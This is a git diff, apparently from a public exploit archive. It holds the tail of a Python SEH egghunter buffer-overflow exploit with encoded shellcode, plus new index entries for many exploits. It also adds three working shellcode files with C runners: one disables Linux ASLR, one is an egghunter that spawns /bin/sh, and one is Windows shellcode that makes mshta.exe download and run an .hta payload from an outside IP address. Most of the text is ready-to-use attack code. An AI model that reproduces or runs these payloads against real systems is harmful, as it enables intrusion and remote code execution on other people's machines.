+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+exploit = "A"*3876
+exploit += "\x74\x06\x75\x04"
+# 0x1001062d - pop pop ret - reg.dll
+exploit += "\x2d\x06\x01\x10"
+exploit += egg
+exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cc50ac2d9..a47226220 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6754,6 +6754,7 @@ id,file,description,date,author,type,platform,port
48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
+48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11125,6 +11126,13 @@ id,file,description,date,author,type,platform,port
48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows,
48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows,
+48687,exploits/windows/local/48687.py,"Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)",2020-07-26,"Felipe Winsnes",local,windows,
+48688,exploits/windows/local/48688.py,"Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48689,exploits/windows/local/48689.py,"DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
+48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
+48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42933,3 +42941,23 @@ id,file,description,date,author,type,platform,port
48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,
48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware,
+48690,exploits/php/webapps/48690.txt,"GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)",2020-07-26,Balzabu,webapps,php,
+48692,exploits/java/webapps/48692.py,"ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection",2020-07-26,aldorm,webapps,java,
+48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,
+48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
+48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
+48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
+48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
+48705,exploits/php/webapps/48705.txt,"elaniin CMS - Authentication Bypass",2020-07-26,BKpatron,webapps,php,
+48706,exploits/php/webapps/48706.txt,"Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)",2020-07-26,V1n1v131r4,webapps,php,
+48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php,
+48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple,
+48709,exploits/php/webapps/48709.txt,"Webtareas 2.1p - Arbitrary File Upload (Authenticated)",2020-07-26,AppleBois,webapps,php,
+48711,exploits/hardware/webapps/48711.py,"F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion",2020-07-26,"Carlos E. Vieira",webapps,hardware,
+48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,
+48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,
+48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
+48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
+48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 5b4a7b3f8..b4f57a163 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1024,3 +1024,6 @@ id,file,description,date,author,type,platform
48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
+48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
+48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
+48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
diff --git a/shellcodes/linux_x86/48592.c b/shellcodes/linux_x86/48592.c
new file mode 100644
index 000000000..f9a60e101
--- /dev/null
+++ b/shellcodes/linux_x86/48592.c
@@ -0,0 +1,79 @@
+# Title: Linux/x86 - ASLR deactivation polymorphic shellcode ( 124 bytes )
+# Author: Xenofon Vassilakopoulos
+# Date: 2020-06-11
+# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
+# Architecture: i686 GNU/Linux
+# Shellcode Length: 124 bytes
+# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-813.php
+# SLAE-ID: SLAE - 1314
+# Description: polymorphic version of ASLR deactivation shellcode
+
+
+------------------ ASLR deactivation ------------------
+
+global _start
+
+section .text
+
+_start:
+ xor ebx,ebx
+ mul ebx
+ mov DWORD [esp-0x4],eax
+ mov DWORD [esp-0x8],0x65636170
+ mov DWORD [esp-0xc],0x735f6176
+ mov DWORD [esp-0x10],0x5f657a69
+ mov DWORD [esp-0x14],0x6d6f646e
+ mov DWORD [esp-0x18],0x61722f6c
+ mov DWORD [esp-0x1c],0x656e7265
+ mov DWORD [esp-0x20],0x6b2f7379
+ mov DWORD [esp-0x24],0x732f636f
+ mov DWORD [esp-0x28],0x72702f2f
+ sub esp,0x28
+ mov ebx,esp
+ mov cx,0x301
+ mov dx,0x2a1
+ add dx,0x1b
+ mov al, 0x5
+ int 0x80
+ mov ebx,eax
+ push ebx
+ mov cx,0x3b30
+ push cx
+ mov ecx,esp
+ shr edx, 16
+ inc edx
+ mov al,0x4
+ int 0x80
+ mov al,0x1
+ int 0x80
+
+------------------ shellcode ------------------
+
+
+#include
+#include
+
+unsigned char code[] = \
+ "\x31\xdb\xf7\xe3\x89\x44\x24\xfc\xc7"
+ "\x44\x24\xf8\x70\x61\x63\x65\xc7\x44"
+ "\x24\xf4\x76\x61\x5f\x73\xc7\x44\x24"
+ "\xf0\x69\x7a\x65\x5f\xc7\x44\x24\xec"
+ "\x6e\x64\x6f\x6d\xc7\x44\x24\xe8\x6c"
+ "\x2f\x72\x61\xc7\x44\x24\xe4\x65\x72"
+ "\x6e\x65\xc7\x44\x24\xe0\x79\x73\x2f"
+ "\x6b\xc7\x44\x24\xdc\x6f\x63\x2f\x73"
+ "\xc7\x44\x24\xd8\x2f\x2f\x70\x72\x83"
+ "\xec\x28\x89\xe3\x66\xb9\x01\x03\x66"
+ "\xba\xa1\x02\x66\x83\xc2\x1b\xb0\x05"
+ "\xcd\x80\x89\xc3\x53\x66\xb9\x30\x3b"
+ "\x66\x51\x89\xe1\xc1\xea\x10\x42\xb0"
+ "\x04\xcd\x80\xb0\x01\xcd\x80";
+
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/48703.c b/shellcodes/linux_x86/48703.c
new file mode 100644
index 000000000..5fb2f2c38
--- /dev/null
+++ b/shellcodes/linux_x86/48703.c
@@ -0,0 +1,75 @@
+# Exploit Title: Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
+# Author: danf42
+# Date: 2020-07-16
+# Platform: Linux/x86
+
+/*******************************************************************************
+ sigaction(2) approach to egghunting as described in the paper
+ "Safely Searching Process Virtual Address Space" by skape
+
+ The shellcode prepares the registers to start the hunting by clearing the
+ direction flag and setting eax, ecx, and edx to 0
+
+Egg value is 0x50905090
+
+global _start
+
+section .text
+
+_start:
+ cld ; clear the direction flag
+ xor ecx, ecx ; clear ecx
+ mul ecx ; multiply by ecx, zero out eax and edx
+IncPage:
+ or cx, 0xfff ; Align page address
+IncAddr:
+ inc ecx ; Go to next address
+ push byte 0x43 ; syscall for sigaction()
+ pop eax ; Put syscall value into EAX
+ int 0x80 ; call sigaction() to check memory location [ECX]
+ cmp al, 0xf2 ; Did it return EFAULT, Bad Address
+ jz IncPage ; Skip page if it returned EFAULT
+ mov eax, 0x50905090 ; Store EGG in EAX
+ mov edi, ecx ; Move ECX to EDI for scasd operation
+ scasd ; Check if [EDI] == EAX then increment EDI
+ jnz IncAddr ; Increment address if no match
+ scasd ; Check if [EDI] == EAX then increment EDI
+ jnz IncAddr ; Increment address if no match
+ jmp edi ; Jump to EDI (our shellcode) if both eggs are found
+
+POC Shellcode to execute /bin/sh
+ xor ecx, ecx ; clear ecx
+ mul ecx ; mutliply eax by 0
+ push eax ; push eax onto stack
+ push 0x68732f2f ; push ASCII sh// onto stack
+ push 0x6e69622f ; push ASCII nib/ onto stack
+ mov ebx, esp ; push /bin/sh into ebx
+ mov al, 0xb ; mov 11 into lower byte of eax
+ int 0x80 ; execute execve syscall
+
+ mov al,0x01 ; move 1 into lower byte of each
+ xor ebx,ebx ; clear ebx
+ int 0x80 ; execute exit syscall
+
+To Cmpile:
+ gcc sigaction_egghunter.c -fno-stack-protector -z execstack -o sigaction_egghunter
+
+*******************************************************************************/
+
+#include
+#include
+
+unsigned char egghunter[] = "\xfc\x31\xc9\xf7\xe1\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
+
+unsigned char shellcode[] = "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc9\xf7\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xcd\x80";
+
+void main()
+{
+ printf("Egghunter Length: %d\n", strlen(egghunter));
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())egghunter;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/48718.c b/shellcodes/windows_x86/48718.c
new file mode 100644
index 000000000..904b38aaf
--- /dev/null
+++ b/shellcodes/windows_x86/48718.c
@@ -0,0 +1,69 @@
+# Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
+# Shellcode Author: Siddharth Sharma
+# Shellcode Length: ~100 bytes
+# Tested on: WIN7x86
+# Date: 2020-06-16
+
+/*
+
+#Description
+# Simply, instead of using mshta.exe to download file as:
+mshta.exe http://:/ ,
+# We could use below shellcode that does the same.
+
+
+
+=============================
+xor eax, eax ;clear eax,get msvcrt.dll
+mov ax, 0x7472 ;"tr\0\0"
+push eax
+push dword 0x6376736d ;cvsm
+push esp
+
+
+mov ebx,0x77e3395c ;call LoadLibraryA
+call ebx
+mov ebp,eax ;msvcrt.dll is saved in ebp
+
+
+;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
+xor eax,eax
+PUSH eax
+PUSH 0x6174682e ;".hta"
+PUSH 0x4f526157 ;"WaRO"
+PUSH 0x4b4d392f ;"/9MK"
+PUSH 0x38303830 ;"8080"
+PUSH 0x3a323931 ;"192:"
+PUSH 0x2e33342e ;".43."
+PUSH 0x3836312e ;".168"
+PUSH 0x3239312f ;"/192"
+PUSH 0x2f3a7074 ;"tp:/"
+PUSH 0x74682065 ;"e ht"
+PUSH 0x78652e61 ;"a.ex"
+PUSH 0x7468736d ;"msht"
+
+
+
+MOV EDI,ESP ;adding a pointer to the stack
+PUSH EDI
+
+
+Mov eax,0x6ffab16f ;call System
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x77e3214f ;call ExitProcess
+call eax
+=====================================
+*/
+
+
+char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";
+
+int main(int argc, char **argv)
+{
+ int(*func)();
+ func = (int(*)()) code;
+ (int)(*func)();
+}
\ No newline at end of file